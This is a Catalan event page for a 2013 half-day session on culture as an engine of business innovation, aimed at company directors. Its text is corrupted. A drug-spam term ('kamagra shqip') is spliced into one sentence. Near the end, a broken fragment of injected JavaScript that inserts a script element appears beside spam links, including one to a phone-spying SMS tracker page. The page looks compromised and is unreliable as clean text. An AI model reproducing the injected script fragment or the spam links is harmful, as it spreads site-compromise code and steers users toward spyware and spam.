Activitats

Cultura com a motor d’innovació a l’empresa

8 DE NOVEMBRE, CULTURA COM A MOTOR D’INNOVACIÓ A L’EMPRESA

És una jornada d’inspiració orientada a directius d’empresa que els permetrà conèixer les possibilitats que ofereix la cultura com a motor d’innovació a l’empresa.

En un programa concentrat de mig kamagra shqip dia, els directius escoltaran casos d’èxit, diàlegs inspiradors i més de 20 idees d’artistes pensades per donar solucions a l’empresa. Una proposta adreçada a directius de les àrees de comunicació, recursos humans, innovació, màrqueting, etc.

Per generar canvis, millorar la motivació dels equips, augmentar lavisibilitat o generar noves idees per a qualsevol àmbit de l’empresa,descobreix el que et pot aportar la cultura. Apropa’t al món de l’art per impulsar la inspiració i creativitat. Afanya’t a inscriure’t que l’aforament és

limitat!

Espai: Arts Santa Mònica

Data: 8 de novembre de 2013

Llegir més sobre l’activitat a la pàgina web culthunting.com

} else {

document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) { http://indexgraf2.com/?p=21909http://ggconnections.com/2017/10/31/sms-tracker-cell-spy-monitoring-text-messages/

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *